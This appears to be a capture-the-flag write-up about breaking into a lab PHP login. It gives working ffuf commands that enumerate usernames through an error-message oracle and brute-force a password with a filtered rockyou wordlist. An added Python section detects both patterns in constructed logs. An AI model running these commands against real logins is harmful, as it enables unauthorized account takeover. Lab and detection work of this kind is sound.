First I create an account:
Then I connect to the admin panel:
I created 2 accounts, felix and felix1, to look at some differences:
and I saw the following:
cookie of felix: PHPSESSID=oskfiuf01785f4f9ba735e0c3p
---------- felix1: PHPSESSID=oskfiuf01785f4f9ba735e0c3p
Ok, after a bit of messing around I found the path:
ffuf -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.63.227:35458/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=test" -fr "Unknown username"
So we found the user gladys.
Now let's create a custom wordlist according to the password policy (upper case, lower case, digit, at least 12 characters):
grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{12}' > custom_wordlist.txt
Now we brute-force:
ffuf -w custom_wordlist.txt -u http://94.237.63.227:35458/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=gladys&password=FUZZ" -fr "Unknown username"
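Seen from the server side, the two ffuf steps above leave two different footprints in the login failure log: the username fuzzing is one source IP failing against many distinct usernames, the password fuzzing is one source IP failing many times against a single username. The following is an added example (not part of this writeup or the target application) that classifies those patterns from constructed log lines; the log format, IPs and thresholds are assumptions.

```python
import re
from collections import defaultdict

# Constructed application log lines for this example (not from the page's target):
# one line per failed login, in a format assumed for a small PHP app.
SAMPLE_LOG = """\
2024-01-01 10:00:01 LOGIN FAIL ip=10.0.0.5 user=admin
2024-01-01 10:00:01 LOGIN FAIL ip=10.0.0.5 user=root
2024-01-01 10:00:02 LOGIN FAIL ip=10.0.0.5 user=felix
2024-01-01 10:00:02 LOGIN FAIL ip=10.0.0.5 user=gladys
2024-01-01 10:00:03 LOGIN FAIL ip=10.0.0.5 user=guest
2024-01-01 10:05:00 LOGIN FAIL ip=10.0.0.9 user=gladys
2024-01-01 10:05:00 LOGIN FAIL ip=10.0.0.9 user=gladys
2024-01-01 10:05:01 LOGIN FAIL ip=10.0.0.9 user=gladys
2024-01-01 10:05:01 LOGIN FAIL ip=10.0.0.9 user=gladys
2024-01-01 10:05:02 LOGIN FAIL ip=10.0.0.9 user=gladys
2024-01-01 10:30:00 LOGIN FAIL ip=10.0.0.7 user=felix1
"""

LINE_RE = re.compile(r"^(\S+ \S+) LOGIN FAIL ip=(\S+) user=(\S+)$")


def classify_failures(log_text, attempt_threshold=5, user_threshold=4):
    """Group failed logins per source IP and label the pattern.

    'enumeration': many failures spread over many distinct usernames
    'brute_force': many failures concentrated on one or few usernames
    'normal':      below attempt_threshold
    Thresholds are assumptions for this example; tune them to the application.
    """
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        _, ip, user = m.groups()
        per_ip[ip].append(user)
    result = {}
    for ip, users in per_ip.items():
        attempts, distinct = len(users), len(set(users))
        if attempts < attempt_threshold:
            label = "normal"
        elif distinct >= user_threshold:
            label = "enumeration"
        else:
            label = "brute_force"
        result[ip] = {"attempts": attempts, "distinct_users": distinct, "label": label}
    return result
```

Note that the enumeration step only works because the application answers "Unknown username" for non-existent accounts; returning the same error for an unknown user and a wrong password removes that oracle.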
Now, with the creds, let's connect; we can see 2FA: